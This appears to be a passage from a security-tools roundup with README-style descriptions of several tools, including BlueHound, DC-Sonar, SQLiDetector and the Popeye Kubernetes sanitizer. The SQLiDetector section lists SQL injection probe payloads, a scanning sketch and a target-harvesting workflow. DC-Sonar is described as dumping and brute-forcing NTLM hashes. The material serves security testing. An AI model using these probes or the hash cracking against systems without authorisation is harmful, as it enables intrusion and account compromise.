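    "MATCH p = shortestPath((u:User)-[:FILTERED_EDGES*1..]->(g:Group)) "
    "RETURN p LIMIT 25"
)

allowed_edges = ["MemberOf", "AdminTo", "HasSession"]  # hypothetical selection
executable = query.replace(":FILTERED_EDGES", ":" + "|".join(allowed_edges))
print(executable)
# MATCH p = shortestPath((u:User)-[:MemberOf|AdminTo|HasSession*1..]->(g:Group)) RETURN p LIMIT 25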

Import & Export Config

The Export Config and Import Config sections can be used to save & load your dashboard and configurations as a backup, and even to share them between users to collaborate and contribute insightful queries to the security community. Don’t worry, your credentials and data won’t be exported.

Note: any arguments for data import tools are also exported, so make sure you remove any secrets before sharing your configuration.

Settings

The Settings section allows you to set some global limits on query execution – maximum query time and a limit for returned results.

Technical Info

BlueHound is a fork of NeoDash, built with React and use-neo4j. It uses charts to power some of the visualizations. You can also extend NeoDash with your own visualizations. Check out the developer guide in the project repository.

Developer Guide

Run & Build using npm

BlueHound is built with React. You'll need npm installed to run the web app.

Use a recent version of npm and node to build BlueHound. The application has been tested with npm 8.3.1 & node v17.4.0.

To run the application in development mode:

  • clone this repository.
  • open a terminal and navigate to the directory you just cloned.
  • execute npm install to install the necessary dependencies.
  • execute npm run dev to run the app in development mode.
  • the application should be available at http://localhost:3000.

To build the app for production:

  • follow the steps above to clone the repository and install dependencies.
  • execute npm run build. This will create a build folder in your project directory.
  • deploy the contents of the build folder to a web server. You should then be able to run the web app.

Questions / Suggestions

We are always open to ideas, comments, and suggestions regarding future versions of BlueHound, so if you have ideas, don’t hesitate to reach out to us at support@zeronetworks.com or open an issue/pull request on GitHub.



GUAC - Aggregates Software Security Metadata Into A High Fidelity Graph Database


Note: GUAC is under active development - if you are interested in contributing, please look at the contributor guide and the "express interest" issue

Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph database—normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.


Conceptually, GUAC occupies the “aggregation and synthesis” layer of the software supply chain transparency logical model:

A few examples of questions answered by GUAC include:

Quickstart

Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!

Architecture

Here is an overview of the architecture of GUAC:

Supported input formats

Additional References

Communication

We encourage discussion on GitHub issues. We also have a public Slack channel on the OpenSSF Slack.

For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.

Governance

Information about governance can be found here.



DC-Sonar - Analyzing AD Domains For Security Risks Related To User Accounts

DC Sonar Community

Repositories

The project consists of repositories:

Disclaimer

It's only for educational purposes.

Avoid using it on production Active Directory (AD) domains.

No contributor bears any responsibility for any use of it.

Social media

Check out our Red Team community Telegram channel

Description

Architecture

For the visual descriptions, open the diagram files using the diagrams.net tool.

The app consists of:


Functionality

The DC Sonar Community provides functionality for analyzing AD domains for security risks related to accounts:

  • Register an AD domain for analysis in the app

  • See the statuses of domain analyzing processes

  • Dump and brute-force NTLM hashes from registered AD domains to list accounts with weak and vulnerable passwords

  • Analyze AD domain accounts to list ones with passwords that never expire

  • Analyze AD domain accounts by their NTLM password hashes to determine accounts and domains where passwords repeat

Installation

Docker

In progress ...

Manually using dpkg

It is assumed that you have a clean Ubuntu Server 22.04 and an account with the username "user".

The app will install to /home/user/dc-sonar.

Future releases may offer a more flexible installation.

Download dc_sonar_NNNN.N.NN-N_amd64.tar.gz from the latest release to the server.

Create a folder for extracting files:

mkdir dc_sonar_NNNN.N.NN-N_amd64

Extract the downloaded archive:

tar -xvf dc_sonar_NNNN.N.NN-N_amd64.tar.gz -C dc_sonar_NNNN.N.NN-N_amd64

Go to the folder with the extracted files:

cd dc_sonar_NNNN.N.NN-N_amd64/

Install PostgreSQL:

sudo bash install_postgresql.sh

Install RabbitMQ:

sudo bash install_rabbitmq.sh

Install dependencies:

sudo bash install_dependencies.sh

It will ask for confirmation of adding the ppa:deadsnakes/ppa repository. Press Enter.

Install dc-sonar itself:

sudo dpkg -i dc_sonar_NNNN.N.NN-N_amd64.deb

It will ask for information for creating a Django admin user. Provide a username, email and password.

It will ask twice for information for creating a self-signed SSL certificate. Provide the required information.

Open: https://localhost

Enter Django admin user credentials set during the installation process before.

Style guide

See the information in STYLE_GUIDE.md

Deployment for development

Docker

In progress ...

Manually using Windows host and Ubuntu Server guest

In this case, we will set up the environment for editing code on the Windows host while running Python code on the Ubuntu guest.

Set up the virtual machine

Create a virtual machine with 2 CPU, 2048 MB RAM, 10GB SSD using Ubuntu Server 22.04 iso in VirtualBox.

If the Ubuntu installer asks to update itself before the VM's installation, agree.

Choose to install OpenSSH Server.

VirtualBox Port Forwarding Rules:

Name                         Protocol  Host IP    Host Port  Guest IP   Guest Port
SSH                          TCP       127.0.0.1  2222       10.0.2.15  22
RabbitMQ management console  TCP       127.0.0.1  15672      10.0.2.15  15672
Django Server                TCP       127.0.0.1  8000       10.0.2.15  8000
NTLM Scrutinizer             TCP       127.0.0.1  5000       10.0.2.15  5000
PostgreSQL                   TCP       127.0.0.1  25432      10.0.2.15  5432

Config Windows

Download and install Python 3.10.5.

Create a folder for the DC Sonar project.

Go to the project folder using Git for Windows:

cd '{PATH_TO_FOLDER}'

Make Windows installation steps for dc-sonar-user-layer.

Make Windows installation steps for dc-sonar-workers-layer.

Make Windows installation steps for ntlm-scrutinizer.

Make Windows installation steps for dc-sonar-frontend.

Set shared folders

Make steps from "Open VirtualBox" to "Reboot VM", but add shared folders to VM VirtualBox with "Auto-mount", like in the picture below:

After reboot, run command:

sudo adduser $USER vboxsf

Log out and log back in with the user account you are using.

In /home/user directory, you can use mounted folders:

ls -l
Output:
total 12
drwxrwx--- 1 root vboxsf 4096 Jul 19 13:53 dc-sonar-user-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 10:11 dc-sonar-workers-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 14:25 ntlm-scrutinizer

Config Ubuntu Server

Config PostgreSQL

Install PostgreSQL on Ubuntu 20.04:

sudo apt update
sudo apt install postgresql postgresql-contrib
sudo systemctl start postgresql.service

Create the admin database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: admin
Shall the new role be a superuser? (y/n) y

Create the dc_sonar_workers_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_workers_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the dc_sonar_user_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_user_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the back_workers_db database:

sudo -u postgres createdb back_workers_db

Create the web_app_db database:

sudo -u postgres createdb web_app_db

Run the psql:

sudo -u postgres psql

Set a password for the admin account:

ALTER USER admin WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_workers_layer account:

ALTER USER dc_sonar_workers_layer WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_user_layer account:

ALTER USER dc_sonar_user_layer WITH PASSWORD '{YOUR_PASSWORD}';

Grant CRUD permissions for the dc_sonar_workers_layer account on the back_workers_db database:

\c back_workers_db
GRANT CONNECT ON DATABASE back_workers_db to dc_sonar_workers_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_workers_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_workers_layer;

Grant CRUD permissions for the dc_sonar_user_layer account on the web_app_db database:

\c web_app_db
GRANT CONNECT ON DATABASE web_app_db to dc_sonar_user_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_user_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_user_layer;

Exit psql:

\q

Open the pg_hba.conf file:

sudo nano /etc/postgresql/12/main/pg_hba.conf

Add the following line to allow connections from the host machine to PostgreSQL, save the changes and close the file:

# IPv4 local connections:
host all all 127.0.0.1/32 md5
host all admin 0.0.0.0/0 md5

Open the postgresql.conf file:

sudo nano /etc/postgresql/12/main/postgresql.conf

Change the params specified below, save the changes and close the file:

listen_addresses = 'localhost,10.0.2.15'
shared_buffers = 512MB
work_mem = 5MB
maintenance_work_mem = 100MB
effective_cache_size = 1GB

Restart the PostgreSQL service:

sudo service postgresql restart

Check the PostgreSQL service status:

service postgresql status

Check the log file if it is needed:

tail -f /var/log/postgresql/postgresql-12-main.log

Now you can connect to the created databases from Windows using the admin account and a client such as DBeaver.

Config RabbitMQ

Install RabbitMQ using the script.

Enable the management plugin:

sudo rabbitmq-plugins enable rabbitmq_management

Create the RabbitMQ admin account:

sudo rabbitmqctl add_user admin {YOUR_PASSWORD}

Tag the created user for full management UI and HTTP API access:

sudo rabbitmqctl set_user_tags admin administrator

Open management UI on http://localhost:15672/.

Install Python3.10

Ensure that your system is updated and the required packages installed:

sudo apt update && sudo apt upgrade -y

Install the required dependency for adding custom PPAs:

sudo apt install software-properties-common -y

Then proceed and add the deadsnakes PPA to the APT package manager sources list as below:

sudo add-apt-repository ppa:deadsnakes/ppa

Install Python 3.10:

sudo apt install python3.10=3.10.5-1+focal1

Install the dependencies:

sudo apt install python3.10-dev=3.10.5-1+focal1 libpq-dev=12.11-0ubuntu0.20.04.1 libsasl2-dev libldap2-dev libssl-dev

Install the venv module:

sudo apt-get install python3.10-venv

Check the version of installed python:

python3.10 --version

Output:
Python 3.10.5
Hosts

Add IP addresses of Domain Controllers to /etc/hosts

sudo nano /etc/hosts

Layers

Set venv

We have to create the venvs one level above, as VirtualBox doesn't allow us to create them in shared folders.

Go to the home directory where the shared folders are located:

cd /home/user

Make deploy steps for dc-sonar-user-layer on Ubuntu.

Make deploy steps for dc-sonar-workers-layer on Ubuntu.

Make deploy steps for ntlm-scrutinizer on Ubuntu.

Config modules

Make config steps for dc-sonar-user-layer on Ubuntu.

Make config steps for dc-sonar-workers-layer on Ubuntu.

Make config steps for ntlm-scrutinizer on Ubuntu.

Run

Make run steps for ntlm-scrutinizer on Ubuntu.

Make run steps for dc-sonar-user-layer on Ubuntu.

Make run steps for dc-sonar-workers-layer on Ubuntu.

Make run steps for dc-sonar-frontend on Windows.

Open https://localhost:8000/admin/ in a browser on the Windows host and agree with the self-signed certificate.

Open https://localhost:4200/ in the browser on the Windows host and log in as the created Django user.



Get-AppLockerEventlog - Script For Fetching Applocker Event Log By Parsing The Win-Event Log


This script will parse all the channels of events from the Windows event log to extract all the logs related to AppLocker. The script will gather all the important pieces of information related to the events for forensic or threat-hunting purposes, or even for troubleshooting. Here are the logs we fetch from the event log:

  • EXE and DLL,
  • MSI and Script,
  • Packaged app-Deployment,
  • Packaged app-Execution.

The output:

  • The result will be displayed on the screen

  • And, The result will be saved to a csv file: AppLocker-log.csv

The juicy and useful pieces of information you will get with this script are:

  • FileType,
  • EventID,
  • Message,
  • User,
  • Computer,
  • EventTime,
  • FilePath,
  • Publisher,
  • FileHash,
  • Package
  • RuleName,
  • LogName,
  • TargetUser.

PARAMETERS

HunType

This parameter specifies the type of events you are interested in; there are four values for this parameter:

1. All

This gets all the events of AppLocker that are interesting for threat-hunting, forensic or even troubleshooting. This is the default value.

.\Get-AppLockerEventlog.ps1 -HunType All

2. Block

This gets all the events that are triggered by the action of blocking an application by AppLocker. This type is critical for threat-hunting or forensics and comes with high priority, since it indicates malicious attempts, or could be a good indicator of prior malicious activity attempting to evade defensive mechanisms.

.\Get-AppLockerEventlog.ps1 -HunType Block |Format-Table -AutoSize

3. Allow

This gets all the events that are triggered by the action of Allowing an application by AppLocker. For threat-hunting or forensics, even the allowed applications should be monitored, in order to detect any possible bypass or configuration mistakes.

.\Get-AppLockerEventlog.ps1 -HunType Allow | Format-Table -AutoSize

4. Audit

This gets all the events generated when AppLocker would block the application if the enforcement mode were enabled (Audit mode). For threat-hunting or forensics, this could indicate any configuration mistake, neglect from the admin to switch the mode, or even a malicious action that happened in the audit phase (tuning phase).

 .\Get-AppLockerEventlog.ps1 -HunType Audit

Resource

To better understand AppLocker :

Contributing

This project welcomes contributions and suggestions.



SQLiDetector - Helps You To Detect SQL Injection "Error Based" By Sending Multiple Requests With 14 Payloads And Checking For 152 Regex Patterns For Different Databases


Simple python script supported with a BurpBounty profile that helps you to detect SQL injection "Error based" by sending multiple requests with 14 payloads and checking for 152 regex patterns for different databases.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
| S|Q|L|i| |D|e|t|e|c|t|o|r|
| Coded By: Eslam Akl @eslam3kll & Khaled Nassar @knassar702
| Version: 1.0.0
| Blog: eslam3kl.medium.com
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


Description

The main idea for the tool is scanning for Error Based SQL Injection by using different payloads like

'123
''123
`123
")123
"))123
`)123
`))123
'))123
')123"123
[]123
""123
'"123
"'123
\123

And matches against 152 error regex patterns for different databases.
Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml

How does it work?

It's very simple; just organize your steps as follows:

  1. Use your subdomain grabber script or tools.
  2. Pass all collected subdomains to httpx or httprobe to get only live subs.
  3. Use your links and URLs tools to grab all waybackurls like waybackurls, gau, gauplus, etc.
  4. Use URO tool to filter them and reduce the noise.
  5. Grep to get all the links that contain parameters only. You can use Grep or GF tool.
  6. Pass the final URLs file to the tool, and it will test them.

The final schema of URLs that you will pass to the tool must look like these:

https://aykalam.com?x=test&y=fortest
http://test.com?parameter=ayhaga

Installation and Usage

Just run the following command to install the required libraries.

~/eslam3kl/SQLiDetector# pip3 install -r requirements.txt 

To run the tool itself.

# cat urls.txt
http://testphp.vulnweb.com/artists.php?artist=1

# python3 sqlidetector.py -h
usage: sqlidetector.py [-h] -f FILE [-w WORKERS] [-p PROXY] [-t TIMEOUT] [-o OUTPUT]
A simple tool to detect SQL errors
optional arguments:
-h, --help                      Show this help message and exit
-f FILE, --file FILE            File of the urls
-w WORKERS, --workers WORKERS   Number of threads
-p PROXY, --proxy PROXY         Proxy host
-t TIMEOUT, --timeout TIMEOUT   Connection timeout
-o OUTPUT, --output OUTPUT      Output file

# python3 sqlidetector.py -f urls.txt -w 50 -o output.txt -t 10

BurpBounty Module

I've created a BurpBounty profile that uses the same payloads and injects them at multiple positions, like

  • Parameter name
  • Parameter value
  • Headers
  • Paths

I think it's more effective and will be helpful for POST requests, which you can't test using the Python script.

How does it test the parameter?

What's the difference between this tool and any other one? Say we have a link like https://example.com?file=aykalam&username=eslam3kl, so we have 2 parameters.

  1. It injects every payload into each parameter in turn, creating the possible vulnerable URLs, like the following
https://example.com?file=123'&username=eslam3kl
https://example.com?file=aykalam&username=123'
  2. It sends a request for every link and checks whether one of the patterns matches, using regex (see the sketch after this list).
  3. Any vulnerable link is saved to a separate file for every process.
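
A minimal sketch of that per-parameter loop, with the payload list and error regexes abbreviated (the tool ships 14 payloads and 152 patterns):

import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

import requests

payloads = ["'123", '"123', "`123"]  # abbreviated payload list
error_patterns = [                   # abbreviated error-regex list
    re.compile(r"SQL syntax.*MySQL", re.I),
    re.compile(r"Warning.*\Wmysqli?_", re.I),
]

def test_url(url: str) -> None:
    parts = urlsplit(url)
    params = dict(parse_qsl(parts.query))
    for name in params:           # inject into one parameter at a time
        for payload in payloads:
            mutated = {**params, name: payload}
            target = urlunsplit(parts._replace(query=urlencode(mutated)))
            body = requests.get(target, timeout=10).text
            if any(p.search(body) for p in error_patterns):
                print(f"[+] Possible error-based SQLi: {target}")

test_url("https://example.com?file=aykalam&username=eslam3kl")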

Upcoming updates

  • Output json option.
  • Adding proxy option.
  • Adding threads to increase the speed.
  • Adding progress bar.
  • Adding more payloads.
  • Adding BurpBounty Profile.
  • Inject the payloads in the parameter name itself.

If you want to contribute, feel free to do that. You're welcome :)

Thanks to

Thanks to Mohamed El-Khayat and Orwa for the amazing payloads and ideas. Follow them and you will learn more

https://twitter.com/Mohamed87Khayat
https://twitter.com/GodfatherOrwa

Stay in touch <3

LinkedIn | Blog | Twitter



Popeye - A Kubernetes Cluster Resource Sanitizer

Popeye - A Kubernetes Cluster Sanitizer

Popeye is a utility that scans a live Kubernetes cluster and reports potential issues with deployed resources and configurations. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive overload one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resource over/under allocations and attempts to warn you should your cluster run out of capacity.

Popeye is a read-only tool; it does not alter any of your Kubernetes resources in any way!


Installation

Popeye is available on Linux, OSX and Windows platforms.

  • Binaries for Linux, Windows and Mac are available as tarballs in the release page.

  • For OSX/Linux using Homebrew/LinuxBrew

    brew install derailed/popeye/popeye
  • Building from source: Popeye was built using go 1.12+. In order to build Popeye from source you must:

    1. Clone the repo

    2. Add the following directive in your go.mod file

      replace (
      github.com/derailed/popeye => MY_POPEYE_CLONED_GIT_REPO
      )
    3. Build and run the executable

      go run main.go

    Quick recipe for the impatient:

    # Clone outside of GOPATH
    git clone https://github.com/derailed/popeye
    cd popeye
    # Build and install
    go install
    # Run
    popeye

PreFlight Checks

  • Popeye uses a 256-color terminal mode. On *Nix systems make sure TERM is set accordingly.

    export TERM=xterm-256color

Sanitizers

Popeye scans your cluster for best practices and potential issues. Currently, Popeye only looks at nodes, namespaces, pods and services. More will come soon! We are hoping Kubernetes friends will pitch in to make Popeye even better.

The aim of the sanitizers is to pick up on misconfigurations, i.e. things like port mismatches, dead or unused resources, metrics utilization, probes, container images, RBAC rules, naked resources, etc...

Popeye is not another static analysis tool. It runs against live clusters, inspects Kubernetes resources and sanitizes them as they are in the wild!

Here is a list of some of the available sanitizers:

Resource (aliases)              Sanitizers
Node (no)                       Conditions, ie not ready, out of mem/disk, network, pids, etc
                                Pod tolerations referencing node taints
                                CPU/MEM utilization metrics, trips if over limits (default 80% CPU/MEM)
Namespace (ns)                  Inactive
                                Dead namespaces
Pod (po)                        Pod status
                                Containers statuses
                                ServiceAccount presence
                                CPU/MEM on containers over a set CPU/MEM limit (default 80% CPU/MEM)
                                Container image with no tags
                                Container image using latest tag
                                Resources request/limits presence
                                Probes liveness/readiness presence
                                Named ports and their references
Service (svc)                   Endpoints presence
                                Matching pods labels
                                Named ports and their references
ServiceAccount (sa)             Unused, detects potentially unused SAs
Secrets (sec)                   Unused, detects potentially unused secrets or associated keys
ConfigMap (cm)                  Unused, detects potentially unused cm or associated keys
Deployment (dp, deploy)         Unused, pod template validation, resource utilization
StatefulSet (sts)               Unused, pod template validation, resource utilization
DaemonSet (ds)                  Unused, pod template validation, resource utilization
PersistentVolume (pv)           Unused, check volume bound or volume error
PersistentVolumeClaim (pvc)     Unused, check bounded or volume mount error
HorizontalPodAutoscaler (hpa)   Unused, Utilization, Max burst checks
PodDisruptionBudget (pdb)       Unused, check minAvailable configuration
ClusterRole (cr)                Unused
ClusterRoleBinding (crb)        Unused
Role (ro)                       Unused
RoleBinding (rb)                Unused
Ingress (ing)                   Valid
NetworkPolicy (np)              Valid
PodSecurityPolicy (psp)         Valid

You can also see the full list of codes

Save the report

To save the Popeye report to a file, pass the --save flag to the command. By default it will create a temp directory and store the report there; the path of the temp directory will be printed on STDOUT. If you need to specify the output directory for the report, use the environment variable POPEYE_REPORT_DIR. By default, the name of the output file follows the format sanitizer_<cluster-name>_<time-UnixNano>.<output-extension> (e.g. "sanitizer-mycluster-1594019782530851873.html"). If you need to specify the output file name for the report, pass the --output-file flag with the desired filename.

Example to save report in working directory:

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save

Example to save report in working directory in HTML format under the name "report.html" :

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save --out html --output-file report.html

Save the report to S3

You can also save the generated report to an AWS S3 bucket (or another S3-compatible object storage) by providing the flag --s3-bucket. As its parameter, provide the name of the S3 bucket where you want to store the report. To save the report in a bucket subdirectory, provide the bucket parameter as bucket/path/to/report.

Under the hood, the AWS Go lib is used, which handles the credential loading. For more information check out the official documentation.

Example to save report to S3:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --out=json

If AWS S3 is not your bag, you can further define an S3 compatible storage (OVHcloud Object Storage, Minio, Google cloud storage, etc...) using s3-endpoint and s3-region as so:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --s3-region YOUR-REGION --s3-endpoint URL-OF-THE-ENDPOINT

Run public Docker image locally

You don't have to build and/or install the binary to run popeye: you can just run it directly from the official docker repo on DockerHub. The default command when you run the docker container is popeye, so you just need to pass whatever cli args are normally passed to popeye. To access your clusters, map your local kube config directory into the container with -v :

  docker run --rm -it \
      -v $HOME/.kube:/root/.kube \
      derailed/popeye --context foo -n bar

Running the above docker command with --rm means that the container gets deleted when popeye exits. When you use --save, popeye will write the report to /tmp inside the container, and that container is deleted on exit, which means you lose the output. To get around this, map your host's /tmp to the container's /tmp. NOTE: You can override the default output directory location by setting the POPEYE_REPORT_DIR env variable.

  docker run --rm -it \
      -v $HOME/.kube:/root/.kube \
      -e POPEYE_REPORT_DIR=/tmp/popeye \
      -v /tmp:/tmp \
      derailed/popeye --context foo -n bar --save --output-file my_report.txt

# Docker has exited, and the container has been deleted, but the file
# is in your /tmp directory because you mapped it into the container
$ cat /tmp/popeye/my_report.txt
<snip>

The Command Line

You can use Popeye standalone or using a spinach yaml config to tune the sanitizer. Details about the Popeye configuration file are below.

# Dump version info
popeye version
# Popeye a cluster using your current kubeconfig environment.
popeye
# Popeye uses a spinach config file of course! aka spinachyaml!
popeye -f spinach.yml
# Popeye a cluster using a kubeconfig context.
popeye --context olive
# Stuck?
popeye help

Output Formats

Popeye can generate sanitizer reports in a variety of formats. You can use the -o cli option and pick your poison from there.

Format      Description                                             Default  Credits
standard    The full monty output, iconized and colorized           yes
jurassic    No icons or color, like it's 1979
yaml        As YAML
html        As HTML
json        As JSON
junit       For the Java melancholic
prometheus  Dumps the report as Prometheus scrapable metrics                 dardanel
score       Returns a single cluster sanitizer score value (0-100)           kabute

The SpinachYAML Configuration

A spinach.yml configuration file can be specified via the -f option to further configure the sanitizers. This file may specify the container utilization threshold and specific sanitizer configurations as well as resources that will be excluded from the sanitization.

NOTE: This file will change as Popeye matures!

Under the excludes key you can configure Popeye to skip certain resources, or certain checks by code. Here, resource types are indicated in a group/version/resource notation. Example: to exclude PodDisruptionBudgets, use the notation policy/v1/poddisruptionbudgets. Note that the resource name is written in the plural form and everything is spelled in lowercase. For resources without an API group, the group part is omitted (Examples: v1/pods, v1/services, v1/configmaps).

A resource is identified by a resource kind and a fully qualified resource name, i.e. namespace/resource_name.

For example, the FQN of a pod named fred-1234 in the namespace blee will be blee/fred-1234. This provides for differentiating fred/p1 and blee/p1. For cluster wide resources, the FQN is equivalent to the name. Exclude rules can have either a straight string match or a regular expression. In the latter case the regular expression must be indicated using the rx: prefix.

NOTE! Please be careful with your regex as more resources than expected may get excluded from the report with a loose regex rule. When your cluster resources change, this could lead to a sub-optimal sanitization. Once in a while it might be a good idea to run Popeye "configless" to make sure you will recognize any new issues that may have arisen in your clusters...

Here is an example spinach file as it stands in this release. There is a fuller eks and aks based spinach file in this repo under spinach. (BTW: for newcomers to the project, this might be a great way to contribute, by adding cluster specific spinach file PRs...)

# A Popeye sample configuration file
popeye:
  # Checks resources against reported metrics usage.
  # If over/under these thresholds a sanitization warning will be issued.
  # Your cluster must run a metrics-server for these to take place!
  allocations:
    cpu:
      underPercUtilization: 200 # Checks if cpu is under allocated by more than 200% at current load.
      overPercUtilization: 50  # Checks if cpu is over allocated by more than 50% at current load.
    memory:
      underPercUtilization: 200 # Checks if mem is under allocated by more than 200% at current load.
      overPercUtilization: 50  # Checks if mem is over allocated by more than 50% usage at current load.

  # Excludes certain resources from Popeye scans
  excludes:
    v1/pods:
      # In the monitoring namespace excludes all probes check on pod's containers.
      - name: rx:monitoring
        codes:
          - 102
      # Excludes all istio-proxy container scans for pods in the icx namespace.
      - name: rx:icx/.*
        containers:
          # Excludes istio init/sidecar container from scan!
          - istio-proxy
          - istio-init
    # ConfigMap sanitizer exclusions...
    v1/configmaps:
      # Excludes key must match the singular form of the resource.
      # For instance this rule will exclude all configmaps named fred.v2.3 and fred.v2.4
      - name: rx:fred.+\.v\d+
    # Namespace sanitizer exclusions...
    v1/namespaces:
      # Exclude all fred* namespaces if the namespaces are not found (404), other error codes will be reported!
      - name: rx:kube
        codes:
          - 404
      # Exclude all istio* namespaces from being scanned.
      - name: rx:istio
    # Completely exclude horizontal pod autoscalers.
    autoscaling/v1/horizontalpodautoscalers:
      - name: rx:.*

  # Configure node resources.
  node:
    # Limits set a cpu/mem threshold in % ie if cpu|mem > limit a lint warning is triggered.
    limits:
      # CPU checks if current CPU utilization on a node is greater than 90%.
      cpu: 90
      # Memory checks if current Memory utilization on a node is greater than 80%.
      memory: 80

  # Configure pod resources
  pod:
    # Restarts check the restarts count and triggers a lint warning if above threshold.
    restarts: 3
    # Check container resource utilization in percent.
    # Issues a lint warning if above these thresholds.
    limits:
      cpu: 80
      memory: 75

  # Configure a list of allowed registries to pull images from
  registries:
    - quay.io
    - docker.io

Popeye In Your Clusters!

Alternatively, Popeye is containerized and can be run directly in your Kubernetes clusters as a one-off or CronJob.

Here is a sample setup, please modify per your needs/wants. The manifests for this are in the k8s directory in this repo.

kubectl apply -f k8s/popeye/ns.yml && kubectl apply -f k8s/popeye
---
apiVersion: batch/v1
kind: CronJob
metadata:
  name: popeye
  namespace: popeye
spec:
  schedule: "* */1 * * *" # Fire off Popeye once an hour
  concurrencyPolicy: Forbid
  jobTemplate:
    spec:
      template:
        spec:
          serviceAccountName: popeye
          restartPolicy: Never
          containers:
            - name: popeye
              image: derailed/popeye
              imagePullPolicy: IfNotPresent
              args:
                - -o
                - yaml
                - --force-exit-zero
                - "true"
              resources:
                limits:
                  cpu: 500m
                  memory: 100Mi

The --force-exit-zero should be set to true. Otherwise, the pods will end up in an error state. Note that popeye exits with a non-zero error code if the report has any errors.

Popeye got your RBAC!

In order for Popeye to do his work, the signed-in user must have enough RBAC oomph to get/list the resources mentioned above.

Sample Popeye RBAC Rules (please note that those are subject to change.)

---
# Popeye ServiceAccount.
apiVersion: v1
kind: ServiceAccount
metadata:
  name: popeye
  namespace: popeye

---
# Popeye needs get/list access on the following Kubernetes resources.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: popeye
rules:
  - apiGroups: [""]
    resources:
      - configmaps
      - deployments
      - endpoints
      - horizontalpodautoscalers
      - namespaces
      - nodes
      - persistentvolumes
      - persistentvolumeclaims
      - pods
      - secrets
      - serviceaccounts
      - services
      - statefulsets
    verbs: ["get", "list"]
  - apiGroups: ["rbac.authorization.k8s.io"]
    resources:
      - clusterroles
      - clusterrolebindings
      - roles
      - rolebindings
    verbs: ["get", "list"]
  - apiGroups: ["metrics.k8s.io"]
    resources:
      - pods
      - nodes
    verbs: ["get", "list"]

---
# Binds Popeye to this ClusterRole.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: popeye
subjects:
  - kind: ServiceAccount
    name: popeye
    namespace: popeye
roleRef:
  kind: ClusterRole
  name: popeye
  apiGroup: rbac.authorization.k8s.io

Screenshots

Cluster D Score

Cluster A Score

Report Morphology

The sanitizer report outputs each resource group scanned and their potential issues. The report is color/emoji coded in terms of Sanitizer severity levels:

Level  Jurassic  Color      Description
Ok     OK        Green      Happy!
Info   I         BlueGreen  FYI
Warn   W         Yellow     Potential Issue
Error  E         Red        Action required

The heading section for each scanned Kubernetes resource provides a summary count for each of the categories above.

The Summary section provides a Popeye Score based on the sanitization pass on the given cluster.

Known Issues

This initial drop is brittle. Popeye will most likely blow up when…

  • You're running older versions of Kubernetes. Popeye works best with Kubernetes 1.13+.
  • You don't have enough RBAC oomph to manage your cluster (see RBAC section)

Disclaimer

This is work in progress! If there is enough interest in the Kubernetes community, we will enhance per your recommendations/contributions. Also if you dig this effort, please let us know that too!

ATTA Girls/Boys!

Popeye sits on top of many open source projects and libraries. Our sincere appreciation to all the OSS contributors who work nights and weekends to make this project a reality!

Contact Info

  1. Email: fernand@imhotep.io
  2. Twitter: @kitesurfer


Tai-e - An Easy-To-Learn/Use Static Analysis Framework For Java


Tai-e

What is Tai-e?

Tai-e (Chinese: 太阿; pronunciation: [ˈtaɪə:]) is a new static analysis framework for Java (please see our technical report for details), which features arguably the "best" designs from both the novel ones we proposed and those of classic frameworks such as Soot, WALA, Doop, and SpotBugs. Tai-e is easy-to-learn, easy-to-use, efficient, and highly extensible, allowing you to easily develop new analyses on top of it.

Currently, Tai-e provides the following major analysis components (and more analyses are on the way):

  • Powerful pointer analysis framework
    • On-the-fly call graph construction
    • Various classic and advanced techniques of heap abstraction and context sensitivity for pointer analysis
    • Extensible analysis plugin system (allows you to conveniently develop and add new analyses that interact with pointer analysis)
  • Various fundamental/client/utility analyses
    • Fundamental analyses, e.g., reflection analysis and exception analysis
    • Modern language feature analyses, e.g., lambda and method reference analysis, and invokedynamic analysis
    • Clients, e.g., configurable taint analysis (allowing you to configure sources, sinks and taint transfers)
    • Utility tools like analysis timer, constraint checker (for debugging), and various graph dumpers
  • Control/Data-flow analysis framework
